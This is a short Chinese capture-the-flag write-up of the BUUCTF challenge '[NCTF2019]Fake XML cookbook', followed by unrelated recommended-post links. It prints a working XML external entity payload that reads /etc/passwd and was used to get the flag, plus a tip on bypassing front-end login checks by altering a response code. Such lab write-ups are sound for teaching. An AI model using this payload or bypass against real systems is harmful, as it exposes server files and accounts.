[NCTF2019]Fake XML cookbook

BUUCTF在线评测BUUCTF 是一个 CTF 竞赛和训练平台,为各位 CTF 选手提供真实赛题在线复现等服务。https://buuoj.cn/challenges#[NCTF2019]Fake%20XML%20cookbook启动靶机,一个登录页面

试了一下弱口令和万能密码,不行.

查看一下源码,发现可能存在xxe(xml外部实体注入)

抓包,尝试一下常见payload,传递一个外部实体DTD看看会不会被执行

复制代码
<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE user [
    <!ENTITY admin SYSTEM "file:///etc/passwd">
]>
<user>
    <username>&admin;</username>
    <password>root</password>
</user>

说明漏洞确实存在,修改一下payload,可以读取到flag{402098c9-0fd9-4c60-8ecd-5683c3931ccd}

=====================

题外话,在看代码的时候,发现code==0 表示登陆失败,code==1 表示登录成功。

某些时候,修改code的值,会自动跳转进入内部页面,从而达到登录绕过。

这种是通过前端来校验用户登录的,很弱,一般还是比较少见的

相关推荐
未来之窗软件服务1 天前
万象EXCEL开发(二)格式解读sharedStrings.xml——东方仙盟练气期
xml·excel·仙盟创梦ide·东方仙盟·万象excel·东方仙盟格式
goTsHgo2 天前
Spring XML 配置简介
xml·java·spring
半导体守望者2 天前
TR帝尔编码器GSD文件 PROFIBUS XML PROFINET EtherCAT 文件 ADH CDH CMV等
xml·经验分享·笔记·机器人·自动化·制造
极光雨雨2 天前
XML中的 CDATA mybaitis xml中的 <![CDATA[ xxxx ]]>
xml
未来之窗软件服务3 天前
万象EXCEL开发(三)格式解读calcChain.xml——东方仙盟练气期
xml·仙盟创梦ide·东方仙盟·万象excel
MintYouth3 天前
【精】C# 精确判断XML是否存在子节点
xml·c#
qq_318693013 天前
XML 站点地图制作与提交全流程,新站收录效率提升 50%
xml·数据库·mysql
卷Java4 天前
WXML 编译错误修复总结
xml·java·前端·微信小程序·uni-app·webview
武子康4 天前
Java-131 深入浅出 MySQL MyCat 深入解析 schema.xml 配置详解:逻辑库、逻辑表、数据节点全攻略
xml·java·数据库·mysql·性能优化·系统架构·mycat
fendouweiqian5 天前
pom.xml 不在根目录,idea无法识别项目处理方案
xml·java·intellij-idea